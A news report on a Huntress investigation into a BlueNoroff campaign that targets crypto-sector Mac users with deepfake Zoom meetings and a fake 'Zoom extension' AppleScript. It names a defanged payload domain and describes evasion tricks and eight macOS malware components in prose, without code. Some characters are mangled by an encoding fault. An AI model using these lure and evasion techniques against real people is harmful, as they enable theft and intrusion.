Cybersecurity firm Huntress has uncovered a highly sophisticated hacking campaign targeting Mac users in the cryptocurrency sector, which utilized deepfake Zoom calls, clever social engineering, and Mac-specific malware in an unusually sophisticated operation.
Huntress began investigating the intrusion on June 11, 2025, after a partner reported suspicious activity. The attack was ultimately attributed to the North Korean hacking group BlueNoroff (also known as Sapphire Sleet or TA444), which has been targeting the cryptocurrency sector with financially driven campaigns since at least 2017.
The hackers specifically target macOS users by using deepfake technology to impersonate company executives in fake Zoom meetings to steal cryptocurrency.
How Does The Scam Work
It all started when an employee (target) at a cryptocurrency foundation received a seemingly innocuous message from an external contact on their Telegram requesting a meeting. The attacker shared a Calendly link that appeared to schedule a Google Meet call, but clicking it redirected the user to a fake Zoom domain controlled by the threat actor.
Several weeks later, the employee joined a “Zoom meeting” populated by deepfakes mimicking senior leadership within their company, along with external contacts. During the meeting,ย the employee was unable to use their microphone, and the deepfakes instructed them to download a โZoom extensionโ. The link to this extension sent to them via Telegram turned out to be a malicious AppleScript file ย (zoom_sdk_support.scpt) disguised as a troubleshooting tool.
Once downloaded, the AppleScript first opened a legitimate webpage for Zoom SDKs, but after over 10,500 blank lines, it downloaded a payload from a malicious website, https[://]support[.]us05web-zoom[.]biz, and executed it.
By the time Huntress began their investigation, the final payload had already been removed from the attackerโs server. However, they wereย able to find a version on VirusTotal that offered valuable insight into what the malware was designed to do.
“The script begins by disabling bash history logging and then checks if Rosetta 2, which allows Apple Silicon Macs to run x86_64 binaries, is installed,” the Huntress researchers explained in a blog post on Wednesday.
“If it isnโt, it silently installs it to ensurex86_64 payloads can run. It then creates a file called .pwd, which is hidden from the userโs view due to the period prepending it and downloads the payload from the malicious, fake Zoom page to /tmp/icloud_helper.”
A Tailored, Mac-Specific Malware
ย Unlike standard off-the-shelf malware, this attack involved a custom-built toolkit with at least eight separate components, all specifically tailored for macOS. They were:
- Telegram 2: The persistent binary, written in Nim, which was responsible for starting the primary backdoor.
- Root Troy V4 (remoted): A full-featured backdoor written in Go, capable of downloading and executing other malicious tools.
- InjectWithDyld (“a”): A C++ binary loader downloaded by Root Troy V4, responsible for decrypting and loading two additional implants.
-
- Base App: A seemingly harmless Swift application that serves as the injection target for malicious code.
- Payload: A different implant written in Nim,ย designed to execute commands on the infected system.
- XScreen (keyboardd): A powerful keylogger written in Objective-C, capable of capturing keystrokes, clipboard content, and screen activity.
- CryptoBot (airmond): A Go-based tool designed to collect cryptocurrency-related files from the victimโs machine.
- NetChk: A decoy binary with no meaningful function, that will generate random numbers forever, likely included for obfuscation or misdirection.
Notably, the malware used clever tricks to avoid detection, such as only executing commands when the Macโs display was asleep. It was carefully crafted to bypass macOS security layers using AppleScript and process injection.
Warning Call for macOS Usersย
Historically, macOS has been seen as a safer operating system, but that perception is increasingly outdated. As more businesses adopt Macs and remote work becomes standard, attackers are adapting quickly.
โOver the last few years, we have seen macOS become a larger target for threat actors, especially with regard to highly sophisticated, state-sponsored attackers,โ Huntress’ researchers noted. โAs these attacks and the frequency in which they occur continue to rise, it will be evermore important to protect your Macs.”
This campaign makes one thing clear: when state-backed groups like BlueNoroff are involved, even a video call isnโt always what it seems.
